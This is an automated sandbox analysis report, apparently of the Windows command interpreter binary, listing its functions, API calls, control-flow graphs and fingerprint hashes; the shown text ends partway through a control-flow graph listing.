                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: wcschr$Heapmemset$AllocCurrentDirectoryProcessiswspace
                                                                              • String ID:
                                                                              • API String ID: 168394030-0
                                                                              • Opcode ID: b5165ffa2db6ef7b8d8da3c0ab750a736ff1024e17944bcf39a6df9fca352c0d
                                                                              • Instruction ID: 37d23bb1ee9afc14ebb7101d34014a149fd39b34cb5805263577405a6b6f32ea
                                                                              • Opcode Fuzzy Hash: b5165ffa2db6ef7b8d8da3c0ab750a736ff1024e17944bcf39a6df9fca352c0d
                                                                              • Instruction Fuzzy Hash: E9A1C421B0C64285FB69BF26D4502B9A3A1BF8C784F449135DE2EC7AF6DF7CA9458700
                                                                              Function 00007FF64B56CD90 Relevance: 3.0, APIs: 2, Instructions: 30memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF64B56B9A1,?,?,?,?,00007FF64B56D81A), ref: 00007FF64B56CDA6
                                                                              • RtlAllocateHeap.NTDLL(?,?,?,00007FF64B56B9A1,?,?,?,?,00007FF64B56D81A), ref: 00007FF64B56CDBD
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$AllocateProcess
                                                                              • String ID:
                                                                              • API String ID: 1357844191-0
                                                                              • Opcode ID: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                                                                              • Instruction ID: 488b87ff52c47a56c4fed9b24cfaf6cb0d0e2be0b037e6c687a91461fb11cfd0
                                                                              • Opcode Fuzzy Hash: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                                                                              • Instruction Fuzzy Hash: 6AF06932A1C642C2EA48BF05F840078FBB0FB8DB01B589035DA6E833B6CF3CA545CA00
                                                                              Function 00007FF64B574D5C Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 268memorylibraryloaderCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 331 7ff64b574d5c-7ff64b574e4b InitializeCriticalSection call 7ff64b5758e4 SetConsoleCtrlHandler _get_osfhandle GetConsoleMode _get_osfhandle GetConsoleMode call 7ff64b570580 call 7ff64b574a14 call 7ff64b574ad0 call 7ff64b575554 GetCommandLineW 342 7ff64b574e4d-7ff64b574e54 331->342 342->342 343 7ff64b574e56-7ff64b574e61 342->343 344 7ff64b574e67-7ff64b574e7b call 7ff64b572e44 343->344 345 7ff64b5751cf-7ff64b5751e3 call 7ff64b563278 call 7ff64b574c1c 343->345 351 7ff64b5751ba-7ff64b5751ce call 7ff64b563278 call 7ff64b574c1c 344->351 352 7ff64b574e81-7ff64b574ec3 GetCommandLineW call 7ff64b5713e0 call 7ff64b56ca40 344->352 351->345 352->351 362 7ff64b574ec9-7ff64b574ee8 call 7ff64b57417c call 7ff64b572394 352->362 366 7ff64b574eed-7ff64b574ef5 362->366 366->366 367 7ff64b574ef7-7ff64b574f1f call 7ff64b56aa54 366->367 370 7ff64b574f95-7ff64b574fee GetConsoleOutputCP GetCPInfo call 7ff64b5751ec GetProcessHeap HeapAlloc 367->370 371 7ff64b574f21-7ff64b574f30 367->371 376 7ff64b575012-7ff64b575018 370->376 377 7ff64b574ff0-7ff64b575006 GetConsoleTitleW 370->377 371->370 373 7ff64b574f32-7ff64b574f39 371->373 373->370 375 7ff64b574f3b-7ff64b574f77 call 7ff64b563278 GetWindowsDirectoryW 373->375 384 7ff64b574f7d-7ff64b574f90 call 7ff64b573c24 375->384 385 7ff64b5751b1-7ff64b5751b9 call 7ff64b574c1c 375->385 380 7ff64b57507a-7ff64b57507e 376->380 381 7ff64b57501a-7ff64b575024 call 7ff64b573578 376->381 377->376 379 7ff64b575008-7ff64b57500f 377->379 379->376 386 7ff64b5750eb-7ff64b575161 GetModuleHandleW GetProcAddress * 3 380->386 387 7ff64b575080-7ff64b5750b3 call 7ff64b58b89c call 7ff64b56586c call 7ff64b563240 call 7ff64b573448 380->387 381->380 397 7ff64b575026-7ff64b575030 381->397 384->370 385->351 389 7ff64b575163-7ff64b575167 386->389 390 7ff64b57516f 386->390 412 7ff64b5750b5-7ff64b5750d0 call 7ff64b573448 * 2 387->412 413 7ff64b5750d2-7ff64b5750d7 call 7ff64b563278 387->413 389->390 395 7ff64b575169-7ff64b57516d 389->395 396 7ff64b575172-7ff64b5751af free call 7ff64b578f80 390->396 395->390 395->396 401 7ff64b575075 call 7ff64b58cff0 397->401 402 7ff64b575032-7ff64b575059 GetStdHandle GetConsoleScreenBufferInfo 397->402 401->380 405 7ff64b57505b-7ff64b575067 402->405 406 7ff64b575069-7ff64b575073 402->406 405->380 406->380 406->401 417 7ff64b5750dc-7ff64b5750e6 GlobalFree 412->417 413->417 417->386
                                                                              APIs
                                                                              • InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF64B574D9A
                                                                                • Part of subcall function 00007FF64B5758E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF64B58C6DB), ref: 00007FF64B5758EF
                                                                              • SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF64B574DBB
                                                                              • _get_osfhandle.MSVCRT ref: 00007FF64B574DCA
                                                                              • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF64B574DE0
                                                                              • _get_osfhandle.MSVCRT ref: 00007FF64B574DEE
                                                                              • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF64B574E04
                                                                                • Part of subcall function 00007FF64B570580: _get_osfhandle.MSVCRT ref: 00007FF64B570589
                                                                                • Part of subcall function 00007FF64B570580: SetConsoleMode.KERNELBASE ref: 00007FF64B57059E
                                                                                • Part of subcall function 00007FF64B570580: _get_osfhandle.MSVCRT ref: 00007FF64B5705AF
                                                                                • Part of subcall function 00007FF64B570580: GetConsoleMode.KERNELBASE ref: 00007FF64B5705C5
                                                                                • Part of subcall function 00007FF64B570580: _get_osfhandle.MSVCRT ref: 00007FF64B5705EF
                                                                                • Part of subcall function 00007FF64B570580: GetConsoleMode.KERNELBASE ref: 00007FF64B570605
                                                                                • Part of subcall function 00007FF64B570580: _get_osfhandle.MSVCRT ref: 00007FF64B570632
                                                                                • Part of subcall function 00007FF64B570580: SetConsoleMode.KERNELBASE ref: 00007FF64B570647
                                                                                • Part of subcall function 00007FF64B574A14: GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF64B5749F1), ref: 00007FF64B574A28
                                                                                • Part of subcall function 00007FF64B574A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF64B5749F1), ref: 00007FF64B574A66
                                                                                • Part of subcall function 00007FF64B574A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF64B5749F1), ref: 00007FF64B574A7D
                                                                                • Part of subcall function 00007FF64B574A14: memmove.MSVCRT(?,?,00000000,00007FF64B5749F1), ref: 00007FF64B574A9A
                                                                                • Part of subcall function 00007FF64B574A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF64B5749F1), ref: 00007FF64B574AA2
                                                                                • Part of subcall function 00007FF64B574AD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF64B568798), ref: 00007FF64B574AD6
                                                                                • Part of subcall function 00007FF64B574AD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF64B568798), ref: 00007FF64B574AEF
                                                                                • Part of subcall function 00007FF64B575554: RegOpenKeyExW.KERNELBASE(?,00000000,?,00000001,?,00007FF64B574E35), ref: 00007FF64B5755DA
                                                                                • Part of subcall function 00007FF64B575554: RegQueryValueExW.KERNELBASE ref: 00007FF64B575623
                                                                                • Part of subcall function 00007FF64B575554: RegQueryValueExW.KERNELBASE ref: 00007FF64B575667
                                                                                • Part of subcall function 00007FF64B575554: RegQueryValueExW.KERNELBASE ref: 00007FF64B5756BE
                                                                                • Part of subcall function 00007FF64B575554: RegQueryValueExW.KERNELBASE ref: 00007FF64B575702
                                                                              • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF64B574E35
                                                                              • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF64B574E81
                                                                              • GetWindowsDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF64B574F69
                                                                              • GetConsoleOutputCP.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF64B574F95
                                                                              • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF64B574FB0
                                                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF64B574FC1
                                                                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF64B574FD8
                                                                              • GetConsoleTitleW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF64B574FF8
                                                                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF64B575037
                                                                              • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF64B57504B
                                                                              • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF64B5750DF
                                                                              • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF64B5750F2
                                                                              • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF64B57510F
                                                                              • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF64B575130
                                                                              • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF64B57514A
                                                                              • free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF64B575175
                                                                                • Part of subcall function 00007FF64B573578: _get_osfhandle.MSVCRT ref: 00007FF64B573584
                                                                                • Part of subcall function 00007FF64B573578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF64B5632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF64B57359C
                                                                                • Part of subcall function 00007FF64B573578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF64B5632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF64B5735C3
                                                                                • Part of subcall function 00007FF64B573578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF64B5632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF64B5735D9
                                                                                • Part of subcall function 00007FF64B573578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF64B5632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF64B5735ED
                                                                                • Part of subcall function 00007FF64B573578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF64B5632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF64B573602
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: Console$Mode_get_osfhandle$Heap$QueryValue$AddressAllocHandleProcProcess$CommandCriticalEnvironmentFreeInfoLineLockSectionSharedStrings$AcquireBufferCtrlDirectoryEnterFileGlobalHandlerInitializeModuleOpenOutputReleaseScreenTitleTypeWindowsfreememmove
                                                                              • String ID: CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$SetConsoleInputExeNameW
                                                                              • API String ID: 1049357271-3021193919
                                                                              • Opcode ID: d2460cf6989233a7a4462fbac63f5e4cbe638dcbee7ad3df93fe443bd3d09fd5
                                                                              • Instruction ID: 8899bd9489f2bc89799711f04e5cb299e1fe4f576a29081c7df505ebb3f4d256
                                                                              • Opcode Fuzzy Hash: d2460cf6989233a7a4462fbac63f5e4cbe638dcbee7ad3df93fe443bd3d09fd5
                                                                              • Instruction Fuzzy Hash: 64C14761A0CA42C6EA0CBF11F8142B9E7A1FF8DB91F449135D92E837B3DF7CA5458640
                                                                              Function 00007FF64B573C24 Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 289COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 420 7ff64b573c24-7ff64b573c61 421 7ff64b57ec5a-7ff64b57ec5f 420->421 422 7ff64b573c67-7ff64b573c99 call 7ff64b56af14 call 7ff64b56ca40 420->422 421->422 424 7ff64b57ec65-7ff64b57ec6a 421->424 431 7ff64b57ec97-7ff64b57eca1 call 7ff64b57855c 422->431 432 7ff64b573c9f-7ff64b573cb2 call 7ff64b56b900 422->432 426 7ff64b57412e-7ff64b57415b call 7ff64b578f80 424->426 432->431 437 7ff64b573cb8-7ff64b573cbc 432->437 438 7ff64b573cbf-7ff64b573cc7 437->438 438->438 439 7ff64b573cc9-7ff64b573ccd 438->439 440 7ff64b573cd2-7ff64b573cd8 439->440 441 7ff64b573cda-7ff64b573cdf 440->441 442 7ff64b573ce5-7ff64b573d62 GetCurrentDirectoryW towupper iswalpha 440->442 441->442 445 7ff64b573faa-7ff64b573fb3 441->445 443 7ff64b573fb8 442->443 444 7ff64b573d68-7ff64b573d6c 442->444 447 7ff64b573fc6-7ff64b573fec GetLastError call 7ff64b57855c call 7ff64b57a5d6 443->447 444->443 446 7ff64b573d72-7ff64b573dcd towupper GetFullPathNameW 444->446 445->440 446->447 448 7ff64b573dd3-7ff64b573ddd 446->448 451 7ff64b573ff1-7ff64b574007 call 7ff64b57855c _local_unwind 447->451 450 7ff64b573de3-7ff64b573dfb 448->450 448->451 453 7ff64b573e01-7ff64b573e11 450->453 454 7ff64b5740fe-7ff64b574119 call 7ff64b57855c _local_unwind 450->454 461 7ff64b57400c-7ff64b574022 GetLastError 451->461 453->454 457 7ff64b573e17-7ff64b573e28 453->457 466 7ff64b57411a-7ff64b57412c call 7ff64b56ff70 call 7ff64b57855c 454->466 460 7ff64b573e2c-7ff64b573e34 457->460 460->460 463 7ff64b573e36-7ff64b573e3f 460->463 464 7ff64b574028-7ff64b57402b 461->464 465 7ff64b573e95-7ff64b573e9c 461->465 467 7ff64b573e42-7ff64b573e55 463->467 464->465 468 7ff64b574031-7ff64b574047 call 7ff64b57855c _local_unwind 464->468 469 7ff64b573e9e-7ff64b573ec2 call 7ff64b572978 465->469 470 7ff64b573ecf-7ff64b573ed3 465->470 466->426 475 7ff64b573e66-7ff64b573e8f GetFileAttributesW 467->475 476 7ff64b573e57-7ff64b573e60 467->476 493 7ff64b57404c-7ff64b574062 call 7ff64b57855c _local_unwind 468->493 486 7ff64b573ec7-7ff64b573ec9 469->486 472 7ff64b573f08-7ff64b573f0b 470->472 473 7ff64b573ed5-7ff64b573ef7 GetFileAttributesW 470->473 482 7ff64b573f0d-7ff64b573f11 472->482 483 7ff64b573f1e-7ff64b573f40 SetCurrentDirectoryW 472->483 479 7ff64b573efd-7ff64b573f02 473->479 480 7ff64b574067-7ff64b574098 GetLastError call 7ff64b57855c _local_unwind 473->480 475->461 475->465 476->475 484 7ff64b573f9d-7ff64b573fa5 476->484 479->472 488 7ff64b57409d-7ff64b5740b3 call 7ff64b57855c _local_unwind 479->488 480->488 490 7ff64b573f46-7ff64b573f69 call 7ff64b57498c 482->490 491 7ff64b573f13-7ff64b573f1c 482->491 483->490 492 7ff64b5740b8-7ff64b5740de GetLastError call 7ff64b57855c _local_unwind 483->492 484->467 486->470 486->493 488->492 503 7ff64b5740e3-7ff64b5740f9 call 7ff64b57855c _local_unwind 490->503 504 7ff64b573f6f-7ff64b573f98 call 7ff64b57417c 490->504 491->483 491->490 492->503 493->480 503->454 504->466
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: _local_unwind$AttributesCurrentDirectoryErrorFileLasttowupper$FullNamePathiswalphamemset
                                                                              • String ID: :
                                                                              • API String ID: 1809961153-336475711
                                                                              • Opcode ID: ba32b8838d86428b32df37d2d44875712fc0c8ae3247368b5d273864595a39ba
                                                                              • Instruction ID: 02470bff9ceec18ea08585efdc929fcdc262a4578189b0ff1dd757016a6632c2
                                                                              • Opcode Fuzzy Hash: ba32b8838d86428b32df37d2d44875712fc0c8ae3247368b5d273864595a39ba
                                                                              • Instruction Fuzzy Hash: B4D15E6270CB8592EA28BF15E4442B9F7A1FB8C750F448135DA6E836B6EF7CE545CB00
                                                                              Function 00007FF64B572394 Relevance: 26.5, APIs: 7, Strings: 8, Instructions: 213COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 602 7ff64b572394-7ff64b572416 memset call 7ff64b56ca40 605 7ff64b57241c-7ff64b572453 GetModuleFileNameW call 7ff64b57081c 602->605 606 7ff64b57e0d2-7ff64b57e0da call 7ff64b574c1c 602->606 611 7ff64b57e0db-7ff64b57e0ee call 7ff64b57498c 605->611 612 7ff64b572459-7ff64b572468 call 7ff64b57081c 605->612 606->611 617 7ff64b57e0f4-7ff64b57e107 call 7ff64b57498c 611->617 612->617 618 7ff64b57246e-7ff64b57247d call 7ff64b57081c 612->618 627 7ff64b57e10d-7ff64b57e123 617->627 623 7ff64b572516-7ff64b572529 call 7ff64b57498c 618->623 624 7ff64b572483-7ff64b572492 call 7ff64b57081c 618->624 623->624 624->627 635 7ff64b572498-7ff64b5724a7 call 7ff64b57081c 624->635 630 7ff64b57e125-7ff64b57e139 wcschr 627->630 631 7ff64b57e13f-7ff64b57e17a _wcsupr 627->631 630->631 632 7ff64b57e27c 630->632 633 7ff64b57e17c-7ff64b57e17f 631->633 634 7ff64b57e181-7ff64b57e199 wcsrchr 631->634 637 7ff64b57e283-7ff64b57e29b call 7ff64b57498c 632->637 636 7ff64b57e19c 633->636 634->636 644 7ff64b5724ad-7ff64b5724c5 call 7ff64b573c24 635->644 645 7ff64b57e2a1-7ff64b57e2c3 _wcsicmp 635->645 639 7ff64b57e1a0-7ff64b57e1a7 636->639 637->645 639->639 642 7ff64b57e1a9-7ff64b57e1bb 639->642 646 7ff64b57e264-7ff64b57e277 call 7ff64b571300 642->646 647 7ff64b57e1c1-7ff64b57e1e6 642->647 652 7ff64b5724ca-7ff64b5724db 644->652 646->632 650 7ff64b57e21a 647->650 651 7ff64b57e1e8-7ff64b57e1f1 647->651 657 7ff64b57e21d-7ff64b57e21f 650->657 653 7ff64b57e1f3-7ff64b57e1f6 651->653 654 7ff64b57e201-7ff64b57e210 651->654 655 7ff64b5724dd-7ff64b5724e4 ??_V@YAXPEAX@Z 652->655 656 7ff64b5724e9-7ff64b572514 call 7ff64b578f80 652->656 653->654 658 7ff64b57e1f8-7ff64b57e1ff 653->658 654->650 659 7ff64b57e212-7ff64b57e218 654->659 655->656 657->637 661 7ff64b57e221-7ff64b57e228 657->661 658->653 658->654 659->657 663 7ff64b57e22a-7ff64b57e231 661->663 664 7ff64b57e254-7ff64b57e262 661->664 665 7ff64b57e234-7ff64b57e237 663->665 664->632 665->664 666 7ff64b57e239-7ff64b57e242 665->666 666->664 667 7ff64b57e244-7ff64b57e252 666->667 667->664 667->665
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: memset$EnvironmentFileModuleNameVariable_wcsuprwcschr
                                                                              • String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
                                                                              • API String ID: 2622545777-4197029667
                                                                              • Opcode ID: 2b85e5479cd390d5377cb4198706a5dfd2306e24395425d55588407f45c83467
                                                                              • Instruction ID: dc8f7e8429f7f48f09cc7281b1b36593ac070dc6b945cad401a459c42c8ef269
                                                                              • Opcode Fuzzy Hash: 2b85e5479cd390d5377cb4198706a5dfd2306e24395425d55588407f45c83467
                                                                              • Instruction Fuzzy Hash: 51913A61B1DB8286EE29BF54D8542B8E3A5FF4CB84F448535C92E876B6DF7CE5058300
                                                                              Function 00007FF64B570580 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 82COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: ConsoleMode_get_osfhandle
                                                                              • String ID: CMD.EXE
                                                                              • API String ID: 1606018815-3025314500
                                                                              • Opcode ID: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                                                              • Instruction ID: 606205e2252657038db90394d01fd250740928c6a89ded98c32441e272369f6c
                                                                              • Opcode Fuzzy Hash: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                                                              • Instruction Fuzzy Hash: 5B41AF75A0DA02CBE61CBF14E855278BAA0BF8E755F489135C92EC23B2DF7CA415CA10
                                                                              Function 00007FF64B56C620 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 312COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 680 7ff64b56c620-7ff64b56c66f GetConsoleTitleW 681 7ff64b56c675-7ff64b56c687 call 7ff64b56af14 680->681 682 7ff64b57c5f2 680->682 687 7ff64b56c689 681->687 688 7ff64b56c68e-7ff64b56c69d call 7ff64b56ca40 681->688 684 7ff64b57c5fc-7ff64b57c60c GetLastError 682->684 686 7ff64b57c5e3 call 7ff64b563278 684->686 692 7ff64b57c5e8-7ff64b57c5ed call 7ff64b57855c 686->692 687->688 688->692 694 7ff64b56c6a3-7ff64b56c6ac 688->694 692->682 695 7ff64b56c954-7ff64b56c95e call 7ff64b57291c 694->695 696 7ff64b56c6b2-7ff64b56c6c5 call 7ff64b56b9c0 694->696 701 7ff64b56c964-7ff64b56c972 call 7ff64b5689c0 695->701 702 7ff64b57c5de-7ff64b57c5e0 695->702 703 7ff64b56c6cb-7ff64b56c6ce 696->703 704 7ff64b56c9b5-7ff64b56c9c9 call 7ff64b575c6c call 7ff64b57855c 696->704 701->684 712 7ff64b56c978-7ff64b56c99a towupper 701->712 702->686 703->692 706 7ff64b56c6d4-7ff64b56c6e9 703->706 727 7ff64b56c9d0-7ff64b56c9d7 704->727 709 7ff64b57c616-7ff64b57c620 call 7ff64b57855c 706->709 710 7ff64b56c6ef-7ff64b56c6fa 706->710 713 7ff64b57c627 709->713 710->713 714 7ff64b56c700-7ff64b56c713 710->714 717 7ff64b56c9a0-7ff64b56c9a9 712->717 719 7ff64b57c631 713->719 718 7ff64b56c719-7ff64b56c72c 714->718 714->719 717->717 722 7ff64b56c9ab-7ff64b56c9af 717->722 723 7ff64b57c63b 718->723 724 7ff64b56c732-7ff64b56c747 call 7ff64b56d3f0 718->724 719->723 722->704 725 7ff64b57c60e-7ff64b57c611 call 7ff64b58ec14 722->725 728 7ff64b57c645 723->728 733 7ff64b56c8ac-7ff64b56c8af 724->733 734 7ff64b56c74d-7ff64b56c750 724->734 725->709 731 7ff64b56c9dd-7ff64b57c6da SetConsoleTitleW 727->731 732 7ff64b56c872-7ff64b56c8aa call 7ff64b57855c call 7ff64b578f80 727->732 738 7ff64b57c64e-7ff64b57c651 728->738 731->732 733->734 737 7ff64b56c8b5-7ff64b56c8d3 wcsncmp 733->737 739 7ff64b56c76a-7ff64b56c76d 734->739 740 7ff64b56c752-7ff64b56c764 call 7ff64b56bd38 734->740 737->739 744 7ff64b56c8d9 737->744 745 7ff64b56c80d-7ff64b56c811 738->745 746 7ff64b57c657-7ff64b57c65b 738->746 742 7ff64b56c773-7ff64b56c77a 739->742 743 7ff64b56c840-7ff64b56c84b call 7ff64b56cb40 739->743 740->692 740->739 749 7ff64b56c780-7ff64b56c784 742->749 764 7ff64b56c84d-7ff64b56c855 call 7ff64b56cad4 743->764 765 